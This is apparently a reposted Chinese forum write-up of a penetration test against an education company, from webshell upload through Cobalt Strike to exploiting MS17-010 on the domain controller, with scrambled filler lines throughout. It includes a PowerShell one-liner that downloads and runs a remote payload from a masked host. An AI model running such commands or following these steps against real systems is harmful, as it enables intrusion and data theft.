|
0 T% [ ~% y, R1 }5 j
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路$ @' i& P2 J! K4 }' U. X
. `0 p4 k& a. k) F7 R m; o( E& e+ C6 t: J( |% ~* G% f
; E6 u1 ^+ d2 k& w8 n
! E5 B) p0 H' r7 x- H
! C" V0 {/ u8 a1 U2 r/ x
正文
* M- n) Z" F8 H U( G8 {; n - h- C1 S* ?4 I# t. p8 z
; C# y( j$ E/ ?/ `6 I+ {5 z: a! P
7 L2 q. d0 X; H+ i3 H
! h% K% \7 V. S1 q6 R7 j" i6 z$ W: |! ]* v" E' M5 {8 Z3 {2 D% u
目标:www.xxxx.com(一家教育机构)
$ z' I" _3 s! ?; m2 h打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能- J0 N; W3 O* m f
# }8 S$ j A) t3 ]% o$ V& S. o& k" Y, O: T* H' J T; c3 U3 |
) _0 [2 l" K/ |3 z( K" Y! t- S8 Q
6 i7 w$ v3 z1 b* H v! t* u9 @- ^3 Q& l
进行了简单的信息搜集
! E2 W9 P9 m8 R$ l3 o
9 } c' z/ X) k* o* X2 }
1 ?$ k5 Y* P a8 j, { 1 v( K# ~. ^9 R2 \' ^! V4 w6 L
+ S: H$ C0 t: X9 d 子域名搜集
- P) @' {/ x' L- Z# A
; T% E, k# j2 e! Q G- I
' b- W t, C9 p: e& a+ i 
- J) T7 n( c: [0 \- s- |
9 ?/ u" C4 O7 Y6 C& v: `* g& E: D- ?* N3 V: c& G/ ]
fofa找资产
$ |7 I5 |" ^3 X( V! w* W
. N9 q$ q7 i# o* M6 B: e; l: o( }! f' c. z1 B2 x1 K [: Q# J3 V
6 f* Y: u1 G+ J4 l
# B7 q8 f7 o5 E  2 D/ Y; h4 F( ~
V7 v3 w( d+ Q, ], N5 u
7 `/ Q: B" K/ v h Z
一共七个资产。去重之后只有两个。
) L @1 D3 G" B( T) l' w" _) c
# g( q! ~0 |3 z: a
# y0 \ X7 ~- n6 V7 O
$ @1 W, g& B3 D) ?% C2 h" P( i4 Y( p* w8 V; p- z# m# w
目录探测
+ _6 o. q) E' M8 e
$ ~* B! J7 d ~ J1 x# s# X
2 n% B6 g# B2 q/ G3 v 
3 b3 Y: b$ O2 t- M" Z1 \5 _ 2 _# ^! b/ F! w) m- w
- L3 J: B/ i! z% w) |( G 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
2 P0 y- j, }( Q0 R8 e
9 C+ p. J1 ]0 P; A6 E5 }6 A8 E1 [ y0 W4 `0 w$ X- Z+ y* ?
0 G& G0 J3 N8 U* Z2 G
1 T- h" q9 w, m4 F 我又尝试了通过修改返回包来绕过登录界面( L- A3 ~( l2 O+ K& ]' f
- J0 G# p$ c- d. n; p
+ D5 q# d+ Q- y# e- y: r
; T7 G3 h4 v* W5 P$ k% M9 E # [; K4 [: h' C# b3 J$ A( m
: j* H( L2 l+ p" o& [ 还是不行,尝试注入无果0 v h2 Z2 F" v7 k
' b( Z+ e) U- r
; S e' ]3 X) T( b 
' {+ l8 d4 T6 ~' B' D: A + e x! g1 k/ m* H$ B
+ i$ S1 g3 P. w6 i, M% ^
不过我目录探测出了一处Spring信息泄露
9 { \3 o& c( g5 I3 E& T# k) S
`% B( [; q |4 J2 H/ w+ C2 F$ C
/ s0 x1 a( z$ y6 ~- b2 L P l5 U0 M3 k! ^* d" h4 `
k( F, }, l0 |3 Q% g
/ K, l" I8 R& w# B $ G: ^+ U- h3 g3 R2 _
# N- I0 j- e5 U% ]+ ?3 l" [! T
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录) p4 n7 h9 i& d$ Y8 }8 ]
8 \6 ^. B# Z# S/ h/ r+ ^7 r. s
' T" E7 }9 a9 L 
4 u! @5 J9 |' a: q" m
1 m, l" y3 B7 v# s4 e6 E
l3 p6 C% ]/ T% G8 O8 ]7 \7 r 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
; g) t3 M) }% s' U
: S$ g; O' p- R
2 h b9 `% g x2 b! X 
- I7 ~2 ^6 F! U5 S7 r+ U8 d# E ( T2 p* w7 }5 `2 I% y+ @1 r
9 I( \, P8 N, E) U/ ]
获取有些师傅到这一步就手机抓包电脑测了。
: j( g- o: O0 c' G& F
- n( l/ e3 K1 d/ _) R) R1 | f! \0 B- K( e7 Q
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
4 t( M) j; {; y' K6 [ U+ `
4 C7 C$ a& H4 R1 K S3 w5 J6 t( n( f0 q8 ~3 S* a
其中在一个公众号发现了小程序,可以进行注册。( q: T! d" d3 ~/ }2 _$ J4 t
) L: i3 F9 j# _- j
1 Z2 O& v$ H. c+ c# g8 W
看到了头像上传,尝试上传获取WebShell- M4 a& m5 {! `- H: N
2 T4 s/ M* f& b- ~$ n0 t
) O' i1 b* w) A; R
 9 Z( f8 ]- N5 ^8 V) m
8 ]* `0 J6 D/ X, T1 _) Y4 F3 k' k& L& B& V& r3 H' a% |
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
% g% N7 a1 B, h# ]* e; t* | @' Q+ y" f3 h- {
4 s/ L% f( ~. c
 " n/ i! {' ]4 N8 z! d, `9 |9 z6 }
- o" `& h" l' p6 G; w6 q$ m- r
6 s, j# D2 b6 L4 q& e$ P 然后上了大马
9 G& y) O' V0 U# v2 f* W - ]- E2 ]* V* W
" K$ H* A, y+ T+ t
 7 R& E6 c. ~! c) `0 S* f7 i, ]& x
( h, \1 b" l, _) K8 o
* w, r) K: X+ x3 L
 . ^/ A7 w% [/ ~- D- Q5 k5 k
6 v* @; V) v6 X- v% T: [
( Z" d+ g% q; k 通过翻找文件发现数据库账号密码
1 h5 O' x7 C. V7 W! n' M. x 5 J+ t9 s* W0 J( ^
$ ^/ B' Q# F2 X  ( g4 P+ w2 |4 T L! y
7 @% P- { @$ ~
$ c f9 w3 f/ J/ V" i T& Z" [# p --内网渗透, G6 d( S( \0 w, W3 f& R# S' f/ ]
. C. p" C6 y. I& R! z7 A
; K6 c9 J. a( v" K; f) z: @ 直接通过powershell执行 cs上线& r4 n' k5 a% g x' ?% G( o2 b
9 Y0 h% ?- K% H K2 ?6 Q
5 L, T4 C8 Z, l( T powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"" U& F# r8 a) F2 ~
0 \7 r: z; n. \& \4 H
6 c, U) b( h" y8 \1 m" o4 R" u7 E4 B  # o9 V6 r5 |( o- a8 b+ H, Q. ~
' O p( \. B- L6 \% d6 @3 l/ s
: g+ j9 }% [+ [; b( S/ h; g 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
& r. W2 O) k. u% m, e* ?8 I' R6 U0 a; M + b( E4 ]6 h, `5 j0 f
5 `% U, a; x9 d- s+ g 
' T5 S4 P9 f6 G9 D; |" _- Y2 x! X, i
5 M2 V" {2 Z. r% a" u; _% s/ q* B8 g0 v2 ~+ y* T0 M
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
1 q6 n9 N- a7 |9 M, x7 R" N% u
( a1 Z$ m2 J5 [! n, M J* [; F
2 A0 w3 ~: e: n! f. j: E, R
/ o: `/ C' c; p! r0 q) O. K v: g
J( f0 k( p% C: W5 n, p# {
: P$ i! R& Y& b5 q5 x8 c 
/ d- D% Q) a3 y3 u) M( N : m/ }! ~. J8 L" i
* T; F- y9 r; `* _+ K; ?
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
, W5 q$ O9 Y, J4 c7 D. ]8 D$ ^0 h( O) r$ z
' E9 a4 J. z9 }7 v
5 F! b4 n r s( j7 \7 Q
0 L& @* p* d1 C" j- ]" A
8 q) a6 e( R6 j! i* l E
( P1 r+ j+ [3 c# }) c8 j9 [3 n
; n% P, m" s- X3 p) u: d1 [( I9 P
1 f9 m; d& I1 D: d4 ? j
1 m9 g# H6 a- {* ]3 J; z
+ `8 }' E9 T$ h
, g6 s" P! f: T+ L" V* S) K; y
4 f% i- D1 j7 W$ A 6 t1 ], i2 _: ~; L8 s; }
- x; t$ @2 @5 m0 W0 e% J2 O. s, x0 o) {; i6 o
小结& u z, _6 h/ a1 r h, R0 X9 G
6 L# v5 K. \* ~/ {8 ^" s8 M6 h
" ]) @, X# y5 f' \
" o, V, u; J" T7 t
2 y/ I% Y8 d/ g3 G. \' l0 A% f/ ~5 S( N: C
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
8 S; Z& X9 ^5 ^
0 B( S, L+ z' ?) |
c& Z) p1 N8 g8 z . Y O! e) H8 q% k7 A
: \( W# h6 ?0 c
/ N: J5 `" y" E' A3 S( x1 H
-
# j! x1 w* N* H
- M( r% B% ]4 k/ M
# C, E+ e6 ^+ ^+ d# H2 u' q0 J1 r - * Z( a, H* k: }8 e
* S4 L& j0 a0 {- I/ F2 S
) ?0 G/ z! ]2 Z1 t! _# S1 f K
! ^- S$ D4 R3 S' d; z
4 ~# [ h; X0 m9 c3 c) F 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
" K# [. N7 l# b- j - d6 U, [ P7 Y* [8 t9 C
$ H5 ~. B7 G* f4 Q5 D" P 7 x" J" o6 {1 y5 `7 a9 N" t
| 
发表于 2024-3-1 19:41:32
收藏
分享
支持
反对